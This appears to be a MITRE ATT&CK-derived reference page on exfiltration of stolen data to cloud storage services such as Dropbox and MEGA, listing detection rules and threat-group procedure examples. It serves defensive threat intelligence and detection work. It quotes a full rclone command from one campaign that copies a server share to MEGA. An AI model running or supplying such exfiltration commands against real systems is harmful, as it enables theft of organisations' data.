Sub-technique of T1567 Exfiltration Over Web Service.View on attack.mitre.org
Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.
Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.
Rules on DetectionCode tagged with T1567.002.
| Rule | Level | Log source |
|---|---|---|
| Curl File Upload To File Sharing Websites | high | windows / process_creation |
| DNS Query for Anonfiles.com Domain - DNS Client | high | windows / NULL |
| DNS Query for Anonfiles.com Domain - Sysmon | high | windows / dns_query |
| PUA - Rclone Execution | high | windows / process_creation |
| PUA - Restic Backup Tool Execution | high | windows / process_creation |
| Suspicious Dropbox API Usage | high | windows / network_connection |
| DNS Query To MEGA Hosting Website | medium | windows / dns_query |
| DNS Query To MEGA Hosting Website - DNS Client | medium | windows / NULL |
| Rclone Activity via Proxy | medium | NULL / proxy |
| Rclone Config File Creation | medium | windows / file_event |
| DNS Query To Ufile.io | low | windows / dns_query |
| DNS Query To Ufile.io - DNS Client | low | windows / NULL |
| Network Connection Initiated To Mega.nz | low | windows / network_connection |
| Rule | Type | Risk | Data source |
|---|---|---|---|
| Cisco NVM - Rclone Execution With Network Activity | Anomaly | NULL | Cisco Network Visibility Module Flow Data |
| Cisco Secure Firewall - Connection to File Sharing Domain | Anomaly | NULL | Cisco Secure Firewall Threat Defense Connection Event |
| Cisco Secure Firewall - Potential Data Exfiltration | Anomaly | NULL | Cisco Secure Firewall Threat Defense Connection Event |
| Gsuite Drive Share In External Email | Anomaly | NULL | G Suite Drive |
| Windows Azure Storage Utility Execution Via CLI | Anomaly | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Windows OneDrive Share Mounted via Net | Anomaly | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Used by | Procedure example |
|---|---|
| GroupAkira | Akira will exfiltrate victim data using applications such as Rclone. |
| GroupChimera | Chimera has exfiltrated stolen data to OneDrive accounts. |
| GroupCinnamon Tempest | Cinnamon Tempest has uploaded captured keystroke logs to the Alibaba Cloud Object Storage Service, Aliyun OSS. |
| GroupConfucius | Confucius has exfiltrated victim data to cloud storage service accounts. |
| GroupContagious Interview | Contagious Interview has exfiltrated stolen passwords to Dropbox. |
| GroupEarth Lusca | Earth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA. |
| GroupEmber Bear | Ember Bear has used tools such as Rclone to exfiltrate information from victim environments to cloud storage such as `mega.nz`. |
| GroupFIN7 | FIN7 has exfiltrated stolen data to the MEGA file sharing site. |
| Used by | Procedure example |
|---|---|
| MalwareBoomBox | BoomBox can upload data to dedicated per-victim folders in Dropbox. |
| MalwareBoxCaon | BoxCaon has the capability to download folders' contents on the system and upload the results back to its Dropbox drive. |
| MalwareClambling | Clambling can send files from a victim's machine to Dropbox. |
| MalwareCreepyDrive | CreepyDrive can use cloud services including OneDrive for data exfiltration. |
| MalwareCrutch | Crutch has exfiltrated stolen data to Dropbox. |
| ToolEmpire | Empire can use Dropbox for data exfiltration. |
| MalwareHAMMERTOSS | HAMMERTOSS exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later. |
| MalwareOctopus | Octopus has exfiltrated data to file sharing sites. |
| Used by | Procedure example |
|---|---|
| CampaignAPT41 DUST | APT41 DUST exfiltrated collected information to OneDrive. |
| CampaignC0015 | During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`. |
| CampaignOperation Dream Job | During Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox. |
Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.